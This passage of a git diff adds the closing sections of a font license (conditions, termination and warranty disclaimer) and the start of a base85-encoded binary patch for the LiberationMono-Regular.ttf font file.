+Permission is hereby granted, free of charge, to any person obtaining a
+copy of the Font Software, to use, study, copy, merge, embed, modify,
+redistribute, and sell modified and unmodified copies of the Font
+Software, subject to the following conditions:
+
+1) Neither the Font Software nor any of its individual components,in
+   Original or Modified Versions, may be sold by itself.
+
+2) Original or Modified Versions of the Font Software may be bundled,
+   redistributed and/or sold with any software, provided that each copy
+   contains the above copyright notice and this license. These can be
+   included either as stand-alone text files, human-readable headers or
+   in the appropriate machine-readable metadata fields within text or
+   binary files as long as those fields can be easily viewed by the user.
+
+3) No Modified Version of the Font Software may use the Reserved Font
+   Name(s) unless explicit written permission is granted by the
+   corresponding Copyright Holder. This restriction only applies to the
+   primary font name as presented to the users.
+
+4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
+   Software shall not be used to promote, endorse or advertise any
+   Modified Version, except to acknowledge the contribution(s) of the
+   Copyright Holder(s) and the Author(s) or with their explicit written
+   permission.
+
+5) The Font Software, modified or unmodified, in part or in whole, must
+   be distributed entirely under this license, and must not be distributed
+   under any other license. The requirement for fonts to remain under
+   this license does not apply to any document created using the Font
+   Software.
+
+
+
+TERMINATION
+This license becomes null and void if any of the above conditions are not met.
+
+
+
+DISCLAIMER
+THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
+OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT.  IN NO EVENT SHALL THE
+COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
+INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
+DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM OTHER
+DEALINGS IN THE FONT SOFTWARE.
diff --git a/fonts/LiberationMono-Regular.ttf b/fonts/LiberationMono-Regular.ttf
new file mode 100644
index 0000000000000000000000000000000000000000..d91164dbfe488cb332e396c38589c783d11c9326
GIT binary patch
literal 319624
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
